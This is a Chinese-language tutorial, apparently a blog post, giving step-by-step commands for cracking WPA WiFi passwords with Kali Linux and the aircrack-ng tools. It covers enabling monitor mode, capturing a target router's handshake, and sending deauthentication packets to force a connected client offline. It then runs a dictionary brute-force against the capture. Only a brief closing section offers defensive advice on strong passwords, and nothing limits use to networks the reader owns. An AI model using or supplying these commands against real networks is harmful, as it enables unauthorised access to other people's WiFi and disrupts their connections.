目录
一、准备
二、案例
1、连接usb无线网卡
2、查看网卡信息
3、开启网卡监听
4、扫描wifi信号
5、抓取握手包
6、强制断开连接
7、破解握手包
三、预防
一、准备
1、usb无线网卡(笔记本也是需要用到)
2、密码字典(Kali 系统自带字典目录wordlists。/usr/share/wordlists)
二、案例
1、连接usb无线网卡
把usb无线网卡插入,并连接至Kali虚拟机。
2、查看网卡信息
【操作命令】
airmon-ng【操作实例】
#说明:wlan0是网卡,后面要使用到
3、开启网卡监听
【操作命令】
airmon-ng start wlan0【操作实例】
#说明:wlan0是网卡,根据1中查看到的结果自行修改
4、扫描wifi信号
【操作命令】
airodump-ng wlan0【操作实例】
#说明:空格可以暂停。
ESSID:WiFi名称。
CH:信道。
BSSID:路由器mac地址。
5、抓取握手包
【操作命令】
airodump-ng -w kalitest -c 1 --bssid 08:10:7C:4A:27:01 wlan0
#说明:以4中扫描出的glovet为例。
-c:指定信道,4中glovet对应的CH。
-w:指定抓取握手包存放名称(kalitest),存放在当前操作目录下。可使用pwd命令查看当前目录。
--bssid:指定路由器mac地址,4中glovet对应的bssid。
【操作实例】
#说明:
BSSID:路由器mac地址
STATION:连接路由器的终端mac地址。
6、强制断开连接
#注意:需要重新打开一个终端执行命令。
5中扫描无结果,无法操作。
【操作命令】
aireplay-ng -0 2 -a 08:10:7C:4A:27:01 -c A0:82:22:49:AE:99 wla0【操作实例】
#说明:-0:指定发送反认证包个数。
-a:指定路由器mac地址。5中扫描结果中的BSSID。
-c:指定客户端mac地址。5中扫描结果中的STATION。
wlan0:网卡名称。
7、破解握手包
【操作命令】
aircrack-ng -w pass.txt kalitest-*.cap#说明:-w:指定密码字典
kalitest-*.cap:*号统配所有cap文件。kalitest对应5中-w对应名称。
【操作实例】
#说明:Current passphrase:就是当前正在尝试破解的密码。我测试时,破解速度是1秒2000左右个密码。
破解依赖于字典,说白了就是通过字典一个一个去试密码,试对了就破解了,字典中没有对应密码就不能破解。字典越大,破解的可能性越高,尝试完成花费时间越长。
获取更多的信息有助于破解,比如具体几位数密码,密码组成(数字、字母等)。
三、预防
对于这种暴力破解的预防,简单点就是密码设置相对复杂。
例如可以设置12位以上,涵盖大写字母、小写字母、数字、符号的混合密码,且不要使用英文单词或有规律的词组。
这种密码不是不能破解,而是需要的时间很长,没有这个价值,别人不会去破解。一般性能的电脑去破解这种程度的密码几乎不太可能,除非运气好。
